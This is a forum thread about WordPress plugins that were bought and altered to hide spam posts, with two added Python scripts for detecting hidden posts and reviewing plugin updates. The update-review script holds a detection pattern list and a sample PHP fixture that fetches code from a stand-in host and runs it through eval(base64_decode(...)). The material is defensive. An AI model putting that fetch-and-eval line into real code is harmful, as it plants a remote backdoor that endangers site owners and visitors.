34+ WordPress Plugins May Be Able To Add Spam Content To Your Blog - And Hide It From Your View!

22 replies
Hello Warriors.

Now, let me first say that the information I have received about this over the past few days has literally made me sick to my stomach.

The fact that people are so willing to do just about anything to make money online is scary, to put it mildly.

For those of you who have Wordfence installed on your WordPress sites (which should be all of you), you may very well be aware of this as the Wordfence team has been doing a great job trying to make everyone aware of this.

So here's the deal in a nutshell...

There is a person (or group of people) purchasing legitimate (and in some cases, very popular) WordPress plugins and altering the code to add a backdoor that would allow them to add spam articles to any sites that had the plugin installed.

According to the two articles from the Wordfence blog (that I have links to below), these spam articles were being used to promote shady businesses such as payday loan companies, etc. What's even more outrageous, however, is that Wordfence uncovered information that the companies that were being promoted using the malicious spam code were companies that are/were actually owned and run by the SAME person who injected the malicious code into the plugins!

The information that Wordfence currently has estimates that there may be as many as 34 plugins or more that have the ability to post to your blog, edit posts, remove posts, replace your affiliate links with theirs, etc.

So far, Wordfence only knows of 4 plugins that are most likely owned by this group.

1. Display Widgets plugin - 200,000+ installs
2. Slimstat Analytics plugin - 100,000+ installs
3. 404 to 301 plugin - 100,000+ installs
4. Finance Calculator plugin - 600+ installs

The original creator of the "Finance Calculator" plugin has come out and said he has retaken control of the plugin and has since removed all malicious code. However, if it were me and I had any of those 4 plugins installed, I would definitely remove them and any trace of them from my WP install.

Also, keep an eye out for any posts appearing on your blog that you know you did not make. As the malicious code can somehow make the spam posts invisible to the site owner, I would maybe try to view your site through a proxy or VPN.

I'm not a programmer and have no idea how they can make the spam post invisible to the site owner, but I'm assuming it's something to do with blocking it from the owner's IP address. I could be very wrong about that. Maybe someone with programming knowledge could comment on that.

I would advise you to read these two articles in their entirety from the Wordfence blog as they have the complete story and much more information:

Initial post

https://www.wordfence.com/blog/2017/...dgets-malware/


Followup post exposing the spammer:

https://www.wordfence.com/blog/2017/...m-mason-soiza/
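The post suggests looking at your own site from a different vantage point (a proxy or VPN) to catch posts that are hidden from the owner. Whatever the hiding mechanism turns out to be (login session, IP address or user agent), the practical check is the same: fetch the front page once as yourself and once as an anonymous visitor, then diff the list of posts. The script below is an added example for this thread, not code from the original post or from Wordfence. It assumes the theme marks post titles up as `<h2 class="entry-title"><a href="...">Title</a></h2>` (the default WordPress convention), and the two HTML snapshots it ships with are constructed stand-ins for two real fetches.

```python
"""Report posts that an anonymous visitor sees but the logged-in site owner does not.

Added example for this thread (not from the original post or from Wordfence).
Assumes the theme uses <h2 class="entry-title"><a href="...">Title</a></h2>;
the OWNER_VIEW / VISITOR_VIEW snapshots below are constructed sample data.
"""
from html.parser import HTMLParser
import urllib.request


class PostListParser(HTMLParser):
    """Collects (title, href) pairs from every entry-title heading on a page."""

    def __init__(self):
        super().__init__()
        self.posts = set()
        self._in_title = False   # inside <h2 class="entry-title">
        self._href = None        # href of the <a> currently being read
        self._text = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        classes = (attrs.get("class") or "").split()
        if tag == "h2" and "entry-title" in classes:
            self._in_title = True
        elif tag == "a" and self._in_title:
            self._href = attrs.get("href")
            self._text = []

    def handle_data(self, data):
        if self._in_title and self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._in_title and self._href is not None:
            title = " ".join("".join(self._text).split())   # normalise whitespace
            self.posts.add((title, self._href))
            self._href = None
        elif tag == "h2":
            self._in_title = False


def extract_posts(html):
    """Return the set of (title, href) pairs linked from entry titles in html."""
    parser = PostListParser()
    parser.feed(html)
    return parser.posts


def fetch(url, cookie=None, user_agent="Mozilla/5.0 (compatible; view-check)"):
    """Fetch one view of the site.  Pass your own login cookie header value for
    the owner view and nothing for the visitor view.  Run the visitor fetch from
    another network or through a proxy if you suspect hiding keyed on your IP."""
    request = urllib.request.Request(url, headers={"User-Agent": user_agent})
    if cookie:
        request.add_header("Cookie", cookie)
    with urllib.request.urlopen(request, timeout=15) as response:
        return response.read().decode("utf-8", errors="replace")


def hidden_from_owner(owner_html, visitor_html):
    """Posts a visitor sees that the owner does not; sorted for stable output."""
    return sorted(extract_posts(visitor_html) - extract_posts(owner_html))


# Constructed snapshots: what the owner sees, and what an anonymous visitor sees.
OWNER_VIEW = """
<main>
  <article><h2 class="entry-title"><a href="https://example.com/hello-world/">Hello world!</a></h2></article>
  <article><h2 class="entry-title"><a href="https://example.com/my-first-review/">My first review</a></h2></article>
</main>"""

VISITOR_VIEW = OWNER_VIEW + """
<article><h2 class="entry-title"><a href="https://example.com/payday-loans/">
  Best payday loans today</a></h2></article>"""

if __name__ == "__main__":
    for title, href in hidden_from_owner(OWNER_VIEW, VISITOR_VIEW):
        print(f"hidden from owner: {title!r} -> {href}")
```

Against a live site you would replace the two constants with `fetch(url, cookie=...)` and `fetch(url)`; an empty result from the anonymous vantage point is the expected outcome on a clean install, and any post that only shows up in the visitor view is worth checking in the database directly.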
  • Brent Stangel:
    Wow! I spent a lot of time on that page. Very interesting stuff!

    Thanks for posting this, CJ.

    Brent
    Signature
    Get Off The Warrior Forum Now & Don't Come Back If You Want To Succeed!
    All The Real Marketers Are Gone. There's Nothing Left But Weak, Sniveling Wanna-Bees!
  • Mark Singletary:
    Even though I saw all that and am following it, I didn't think to post it here so thanks for sharing.

    I use WP-Slimstat and now not sure if I want to continue. I keep checking the site for an update on this part. He said he had reached out to the main programmer for verification.

    Mark
  • Brent Stangel:
    Just for fun, I ran Sucuri's free scan: https://sitecheck.sucuri.net/

    I don't know how reliable their scan is and I'm certainly not saying this is the be all end all, but I found it interesting.


    So, what's a good firewall?

    Brent
    Signature
    Get Off The Warrior Forum Now & Don't Come Back If You Want To Succeed!
    All The Real Marketers Are Gone. There's Nothing Left But Weak, Sniveling Wanna-Bees!
    • (author name not shown):
      haha. I love this
  • jeandevenish:
    What an excellent post!!!!
    • discrat:
      Originally Posted by jeandevenish:
      > What an excellent post!!!!
      Come on guys We can do better than this.
      What was excellent about his Post? That he gave a heads up to protect WP owners from malicious behavior? Or possibly telling you that ALL of us should have Wordfence installed on our WP blogs?

      Maybe take a look at this : https://www.warriorforum.com/off-top...rrggghhhh.html
      • jeandevenish:
        For me, it was an eye opener, so I believe it is excellent, maybe not for you, but surely for me.
  • Lena01:
    Akismet. (794 total ratings) Akismet checks your comments and contact form submissions against our global database of spam to... ...
    Jetpack by WordPress.com. (1389 total ratings) ...
    WP Super Cache. (1275 total ratings) ...
    bbPress. (320 total ratings)
    • nicheblogger75:
      Originally Posted by Lena01:
      > Akismet. (794 total ratings) Akismet checks your comments and contact form submissions against our global database of spam to... ...
      > Jetpack by WordPress.com. (1389 total ratings) ...
      > WP Super Cache. (1275 total ratings) ...
      > bbPress. (320 total ratings)
      And this information pertains to this thread how?

      Actually, a better question is what in the world does it even mean?

      I really think it's time for WF to make ALL signature links a paid feature. This would weed out all of these "one line warriors" who obviously come here and leave lousy 4 or 5 word posts for the sole reason of getting sig link exposure.

      It's really taking away from the value of the forum and not only that, it's discouraging to all of the loyal members whose threads and posts are actually helping people and adding value.

      My guess is that charging for the PRIVILEGE of having a signature link would weed out all of the people who are here for the WRONG reason.

      It doesn't have to be a lot. Even $2 a month would weed out the sig spammers.
  • Eric Michalsen:
    Great information here. Thank you for sharing.

    For those interested in hardening their WP site, I would recommend the video series at Lynda.com, Wordpress: Developing Secure Sites by Jeff Starr

    I have cleaned a lot of pharma hacked sites, but it was Jeff's videos that really helped me understand the process.
  • spearce000:
    [DELETED]
    • Eric Michalsen:
      ..or, just a thought, you could make it free for everyone, because it is free for everyone: https://perishablepress.com/6g/
    • nicheblogger75:
      Originally Posted by spearce000:
      > FYI - my WordPress security WSO is now available FREE for War Room Members.. It has details about how to install a (free) firewall.
      All you need to do is install the free version of Wordfence and that provides a firewall.

      IMO, EVERYONE who has a WordPress site that they want protected should at least have the free version of Wordfence. If you are a serious blogger, you should have the upgraded version.

      It's absolutely the BEST for protecting your WP install.

      This is how many attacks on my site Wordfence has stopped this month alone so far:



      I'm not affiliated with Wordfence in any way. I just LOVE the plugin.

      I think you'd be crazy not to install it. It's one of the first things I do when I set up a new site.

      Also, their blog is incredible and jam packed with useful information that will help you to keep your site safe. And if for some reason you do get hacked (which I hope never happens), they can help you with that as well.

      2,000,000+ installs pretty much says it all I think. You can grab it for free here:

      https://wordpress.org/plugins/wordfence/
  • sirtrung:
    [DELETED]
  • Claire Koch:
    no thanks no want that. Was that too short? Sowwry. I just took a look at your one liners on this thread they don't have sig files.
    • nicheblogger75:
      Originally Posted by Claire Koch:
      > no thanks no want that. Was that too short? Sowwry. I just took a look at your one liners on this thread they don't have sig files.
      That's because they don't have enough posts yet. I think you need to have a certain number of posts before you can post a sig link. Also, the mods have removed a few of the posts (and rightly so).

      I'm sorry but I really feel that the WF needs to do something to discourage people from joining the forum and posting simply to get exposure for a sig link. The bottom line is that it's detrimental and lowers the quality of the forum posts.

      I'm not saying that charging a fee to have a sig link is the only solution. Maybe raising the number of posts to 100 before you can have a sig would be better, or only allowing people that have been here for less than a certain amount of time to link to a post inside the WF, such as a classified ad or WSO that they posted. This would require them to purchase a classified ad or a WSO post in order to have a sig if they have been here for less than, say 90 days.

      All I'm saying is something needs to be done because I'm getting sick of threads getting hijacked with posts like "Nice post," or " I didn't know that," or "That's interesting."

      Unless somebody can explain to me how posts like that help anybody or add any value to a thread, I see no reason for people to make them other than to get exposure for their sig links.
  • Ghost Shinobi:
    Wowzers! Nice find and share - thanks for informing Warriors about those dodgy plug-ins - IMHO: If you do not already follow or have an interest in "infosec", I recommend you read up and stay informed to find out about things like this and stay protected from it.

    It's a shame that shady people exist with their dodgy practices. Thanks for the expose on this one.

    Stay vigilant,
    Peace,
    Ghost Shinobi
  • hsahadath:
    You have shared amazing info. Thanks for helping us.
    Keep sharing.
    Mytechgoal.
    • nicheblogger75:
      Originally Posted by hsahadath:
      > You have shared amazing info. Thanks for helping us.
      > Keep sharing.
      > Mytechgoal.
      Glad to help.

      The more I've been learning about the way the WordPress plugin repository works, the more I see how easy it can be manipulated.

      I did discover that WordPress frowns upon people selling the plugins they developed that are in the repository, and it's for the exact reason that this is how things like this happen.

      The way I understand it, when you submit a plugin there, it then becomes open source and anyone can take any plugin that's in there and work on it and even sell it if they like. They could even change the plugin considerably and submit it to the repository themselves as an entirely different plugin. This is all legal, because any plugin submitted to the repository becomes open source and anyone can work on it. The whole point of open source is for people to improve upon the software.

      However, if you were to do that and submit the plugin, it would start with zero installs and very little popularity.

      So, the reason why WordPress does not want a person who has a really popular plugin with thousands of installs to sell their account to someone else is because of what happens here.

      For example, let's say I contact a person who has a plugin in the repository that has a million installs. I then ask them if I can buy the plugin from them. Since it's open source, there's no reason to buy the plugin at all, but what the person is REALLY after is the access to the plugin with all of the installs. In other words, if they buy a plugin in the repository that has a million installs, they can then update it and add any code they want to it, and as soon as a person who has the plugin installed on their site updates it, then the NEW code is now on the plugin.

      It's somewhat hard to explain but the bottom line is that anybody who is offering to buy plugins from the original developer with access to the account may be looking to do so for the sole reason of injecting malicious code into it.

      It's perfectly legal to take any plugin in the WordPress repository and add to it and turn it into a whole new plugin. You can do the same thing with any theme in the repository.

      I wasn't aware of this until I did a bunch of research and learned that once you submit your plugin to the WordPress repository, there is no copyright on it. Anyone can take the plugin and add to it and then rename it and even sell it. As long as you have made changes to the code, I believe you can even upload it to the repository under your own account and give it a different name.

      I've heard that this is actually how a lot of people get ideas for new plugins that get sold. They take the framework from a plugin in the repository, give it to a developer, and pay them to add their ideas to it, then turn around and sell it as their own plugin.

      Maybe I'm wrong but from what I've been reading it seems like a lot of people do this and it's perfectly legal.
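The mechanism described in this reply is a supply-chain problem: whoever controls the repository account controls the next update, and the update lands on every site that applies it. The defender's counter is to look at what an update actually changes before it goes live. The script below is an added example for this thread (not the forum's, not Wordfence's and not any plugin's own code): it diffs the installed plugin directory against the freshly downloaded update, lists added, removed and changed files, and flags newly added PHP lines containing constructs that a widget or analytics plugin rarely needs (eval of decoded blobs, hard-coded remote fetches, a plugin writing posts on its own). The pattern list is a heuristic assumption, and the two-version toy plugin it builds in a temp directory is constructed sample data.

```python
"""Review a WordPress plugin update before applying it.

Added example for this thread (not code from the forum, Wordfence or any plugin).
Assumptions: the SUSPICIOUS pattern list is a heuristic; the toy plugin built by
build_sample() is constructed data standing in for installed/downloaded versions.
"""
import difflib
import hashlib
import os
import re
import tempfile

# Constructs that rarely belong in a widget/analytics plugin.  A hit means
# "read this code before updating", not "this is malicious".
SUSPICIOUS = re.compile(
    r"\b(?:eval|base64_decode|gzinflate|str_rot13|create_function)\s*\("
    r"|\bwp_insert_post\s*\("                                    # plugin creating posts itself
    r"|\b(?:curl_init|file_get_contents|wp_remote_get)\s*\(\s*['\"]https?://",  # hard-coded remote fetch
    re.IGNORECASE,
)


def file_hashes(root):
    """Map every file under root (path relative to root) to its SHA-256."""
    hashes = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                hashes[os.path.relpath(path, root)] = hashlib.sha256(fh.read()).hexdigest()
    return hashes


def diff_plugin(old_root, new_root):
    """Classify files as added, removed or changed between two plugin versions."""
    old, new = file_hashes(old_root), file_hashes(new_root)
    return {
        "added": sorted(set(new) - set(old)),
        "removed": sorted(set(old) - set(new)),
        "changed": sorted(p for p in set(old) & set(new) if old[p] != new[p]),
    }


def added_lines(old_path, new_path):
    """Lines present in new_path but not old_path (the '+' side of a unified diff)."""
    with open(old_path, encoding="utf-8", errors="replace") as a, \
         open(new_path, encoding="utf-8", errors="replace") as b:
        diff = difflib.unified_diff(a.readlines(), b.readlines(), n=0)
    return [line[1:].rstrip("\n") for line in diff
            if line.startswith("+") and not line.startswith("+++")]


def review_update(old_root, new_root):
    """Return (relative_path, line) for every suspicious PHP line the update introduces."""
    findings = []
    report = diff_plugin(old_root, new_root)
    for rel in report["added"]:                       # brand-new files: scan every line
        if rel.endswith(".php"):
            with open(os.path.join(new_root, rel), encoding="utf-8", errors="replace") as fh:
                lines = [line.rstrip("\n") for line in fh]
            findings += [(rel, line) for line in lines if SUSPICIOUS.search(line)]
    for rel in report["changed"]:                     # edited files: scan only what was added
        new_lines = added_lines(os.path.join(old_root, rel), os.path.join(new_root, rel))
        if rel.endswith(".php"):
            findings += [(rel, line) for line in new_lines if SUSPICIOUS.search(line)]
    return findings


WIDGET_PHP = """<?php
/* Plugin Name: Example Widgets
 * Version: %s */
function ew_register() { register_widget('Example_Widget'); }
add_action('widgets_init', 'ew_register');
"""


def build_sample():
    """Construct a toy plugin: the installed version and an update that ships one extra file."""
    base = tempfile.mkdtemp(prefix="plugin-review-")
    old, new = os.path.join(base, "installed"), os.path.join(base, "update")
    os.makedirs(old)
    os.makedirs(new)
    with open(os.path.join(old, "example-widgets.php"), "w") as fh:
        fh.write(WIDGET_PHP % "2.6.1")
    with open(os.path.join(new, "example-widgets.php"), "w") as fh:
        fh.write(WIDGET_PHP % "2.6.3")              # harmless version bump
    with open(os.path.join(new, "geolocation.php"), "w") as fh:  # constructed: file the old version never had
        fh.write("<?php\n$payload = wp_remote_get('http://example.invalid/geo.php');\n"
                 "eval(base64_decode($payload['body']));\n")
    return old, new


if __name__ == "__main__":
    installed, update = build_sample()
    print(diff_plugin(installed, update))
    for rel, line in review_update(installed, update):
        print(f"{rel}: {line}")
```

On a real site, `installed` is the plugin folder under `wp-content/plugins/` and `update` is the unpacked zip from the repository; a version bump that also adds a new file fetching code from a remote host is exactly the shape of change worth reading in full before clicking update.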
  • fantrom:
    The most interesting fact is that it seems the spammer (Mason Soiza) was once an active member of the Warrior Forum:

    http://www.warriorforum.com/members/mason-soiza.html
  • Kay King:
    I really think it's time for WF to make ALL signature links a paid feature.
    They are a paid feature now and have been for some time - amazing what $5 can buy these days....

    Also interesting is the increase in "lists" used as answers...been checking them out and find almost all are taken from other sites online - quora is a big fave of those folks.

    Sometimes I wonder if the internet will eventually die of suffocation from the amount of spam on it....
    Signature
    Saving one dog will not change the world - but the world changes forever for that one dog
    ***
    My ducks are absolutely not in a row. I don't even know where some of them are...
    ...and I'm pretty sure one of them is a pigeon.
  • nicheblogger75:
    I didn't know that forum sigs were a paid feature. Maybe it only applies to people who joined after the rule went into effect. At any rate, maybe $5 isn't enough because it doesn't seem to deter the sig spammers at all.

    Anyhow, back on subject...

    Wordfence has posted a third installment to their blog about this situation.

    Apparently they have confirmed a total of 9 plugins that were definitely compromised, but it appears most of them have been fixed and are now safe.

    Since the article is quite lengthy, I would advise reading it if you have time.

    Here's the link to the article:

    https://www.wordfence.com/blog/2017/...d-plugin-spam/
    • discrat:
      Originally Posted by nicheblogger75:
      > I didn't know that forum sigs were a paid feature. Maybe it only applies to people who joined after the rule went into effect. At any rate, maybe $5 isn't enough because it doesn't seem to deter the sig spammers at all.
      Yeah they should make it an annual fee of $5 (or $10). One time fee won't cut it as far as weeding out the crap, imo
  • Mark Singletary:
    If you have used one of these plugins in the past, are you going to continue using them?

    I use Slimstat on all my sites. It is supposedly clean now according to the latest update. But, if this was a big scam operation, wouldn't they be expected to say it was all clean now?

    No one is going to say, "Yep, our software has secret spamming stuff inside. Enjoy!" even if it does.

    Mark